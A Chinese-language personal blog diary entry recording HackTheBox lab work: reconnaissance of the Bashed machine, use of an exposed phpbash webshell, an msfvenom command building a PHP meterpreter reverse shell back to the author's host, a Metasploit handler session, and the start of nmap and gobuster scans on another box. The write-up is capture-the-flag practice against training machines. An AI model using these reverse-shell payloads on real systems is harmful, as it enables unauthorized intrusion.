2021/3/29的修行

2021-03-30

字数统计: 1.3k字 | 阅读时长≈ 7分

1. 上班

2. 塑形课

3. 继续学习《设计模式之禅》

4. SDL_GameControllerDB_Util发新版本

5. HackTheBox Retired 【Bashed】打掉

5.1 gobuster

。。。因为昨天htb的网络条件太糟糕了所以数据太脏了，得洗一下

gobuster输出

写个java脚本洗一下吧

package com.xenoamess;

import org.apache.commons.io.IOUtils;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws IOException {
        Pattern pattern = Pattern.compile("^/\\w*\\s*\\(Status: ");

        try (BufferedReader reader = IOUtils.buffer(new InputStreamReader(Main.class.getClassLoader().getResourceAsStream("1.txt")))) {
            while (true) {
                String line = reader.readLine();
                if (line == null) {
                    break;
                }
                if (pattern.matcher(line).find()) {
                    System.out.println(line);
                }
            }
        }
    }
}

gobuster的输出放在1.txt

洗出来后数据：

/images               (Status: 301) [Size: 317] [--> http://10.129.124.215/images/]
/php                  (Status: 301) [Size: 314] [--> http://10.129.124.215/php/]
/uploads              (Status: 301) [Size: 318] [--> http://10.129.124.215/uploads/]
/dev                  (Status: 301) [Size: 314] [--> http://10.129.124.215/dev/]
/css                  (Status: 301) [Size: 314] [--> http://10.129.124.215/css/]
/js                   (Status: 301) [Size: 313] [--> http://10.129.124.215/js/]

一个个试一试呗。

images和upload昨天试了，没啥好玩的

嗯昨天页面上看他一直介绍一个叫phpbash.php的轮子，还明说了这台机子上就有

那就挨个试试呗

怎么想都是/php和/dev嫌疑最大。

好，最终找到

http://10.129.124.215/dev/phpbash.php

拿到user

5.2 提权

思路是搞一个php reverse shell

1	msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=2468 -f raw -o xenoamess.php

用dev.php + vim强行写进去

然后拿metasploit连上就完事了

emmmmm

最后选择了本地起一个http服务

然后让webshell那边wget

动静大点也无所谓吧毕竟是靶机

顺带一提 dev里没权限写入文件

得cd去uploads里才行

然后打一波

http://10.129.125.123/uploads/xenoamess.php

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.16.4
LHOST => 10.10.14.18
msf6 exploit(multi/handler) > set LPORT 2468
LPORT => 2468
msf6 exploit(multi/handler) > set ExitOnSession true
ExitOnSession => false
msf6 exploit(multi/handler) > exploit

…连不上。

能创建session但是不能开。

（或许是因为糟糕的网络条件吧）

切那算了溜了溜了

5. HackTheBox Challenge 【Emdee five for life】打掉（使用方术）

写一个tampermonkey脚本即可。

注意，如果你的全局梯子的延迟的级别在100ms级(或更高)，请关掉你的全局梯子

注意，其中md5部分抄自 https://github.com/blueimp/JavaScript-MD5

代码这里就不贴了，详见Emdee Five For Life

7. HackTheBox Alive 【Delivery】打掉（进行中）

7.1 nmap

惯例nmap

$ nmap -v -A -Pn 10.129.125.131
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-30 03:08 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:08
Completed NSE at 03:08, 0.00s elapsed
Initiating NSE at 03:08
Completed NSE at 03:08, 0.00s elapsed
Initiating NSE at 03:08
Completed NSE at 03:08, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 03:08
Completed Parallel DNS resolution of 1 host. at 03:08, 0.01s elapsed
Initiating Connect Scan at 03:08
Scanning 10.129.125.131 [1000 ports]
Connect Scan Timing: About 15.50% done; ETC: 03:11 (0:02:49 remaining)
Discovered open port 80/tcp on 10.129.125.131
Discovered open port 22/tcp on 10.129.125.131
Connect Scan Timing: About 50.92% done; ETC: 03:10 (0:00:59 remaining)
Increasing send delay for 10.129.125.131 from 0 to 5 due to max_successful_tryno increase to 4
Completed Connect Scan at 03:09, 76.91s elapsed (1000 total ports)
Initiating Service scan at 03:09
Scanning 2 services on 10.129.125.131
Completed Service scan at 03:09, 6.47s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.125.131.
Initiating NSE at 03:09
Completed NSE at 03:10, 6.64s elapsed
Initiating NSE at 03:10
Completed NSE at 03:10, 0.94s elapsed
Initiating NSE at 03:10
Completed NSE at 03:10, 0.00s elapsed
Nmap scan report for 10.129.125.131
Host is up (0.23s latency).                                                                                                                                                                                                                                                              
Not shown: 998 closed ports                                                                                                                                                                                                                                                              
PORT   STATE SERVICE VERSION                                                                                                                                                                                                                                                             
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                                                                                                                                                                      
| ssh-hostkey:                                                                                                                                                                                                                                                                           
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)                                                                                                                                                                                                                           
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)                                                                                                                                                                                                                          
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)                                                                                                                                                                                                                        
80/tcp open  http    nginx 1.14.2                                                                                                                                                                                                                                                        
| http-methods:                                                                                                                                                                                                                                                                          
|_  Supported Methods: GET HEAD                                                                                                                                                                                                                                                          
|_http-server-header: nginx/1.14.2                                                                                                                                                                                                                                                       
|_http-title: Welcome                                                                                                                                                                                                                                                                    
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                                         
NSE: Script Post-scanning.                                                                                                                                                                                                                                                               
Initiating NSE at 03:10                                                                                                                                                                                                                                                                  
Completed NSE at 03:10, 0.00s elapsed                                                                                                                                                                                                                                                    
Initiating NSE at 03:10                                                                                                                                                                                                                                                                  
Completed NSE at 03:10, 0.00s elapsed                                                                                                                                                                                                                                                    
Initiating NSE at 03:10                                                                                                                                                                                                                                                                  
Completed NSE at 03:10, 0.00s elapsed                                                                                                                                                                                                                                                    
Read data files from: /usr/bin/../share/nmap                                                                                                                                                                                                                                             
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                                                                           
Nmap done: 1 IP address (1 host up) scanned in 91.27 seconds

gobuster

gobuster dir -u http://10.10.10.222/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.222/                                                                                                                                                                                                                                        
[+] Method:                  GET                                                                                                                                                                                                                                                         
[+] Threads:                 10                                                                                                                                                                                                                                                          
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt                                                                                                                                                                                                       
[+] Negative Status codes:   404                                                                                                                                                                                                                                                         
[+] User Agent:              gobuster/3.1.0                                                                                                                                                                                                                                              
[+] Timeout:                 10s                                                                                                                                                                                                                                                         
===============================================================                                                                                                                                                                                                                          
2021/03/30 03:28:24 Starting gobuster in directory enumeration mode                                                                                                                                                                                                                      
===============================================================                                                                                                                                                                                                                          
/images               (Status: 301) [Size: 185] [--> http://10.10.10.222/images/]                                                                                                                                                                                                        
/assets               (Status: 301) [Size: 185] [--> http://10.10.10.222/assets/]                                                                                                                                                                                                        
/error                (Status: 301) [Size: 185] [--> http://10.10.10.222/error/]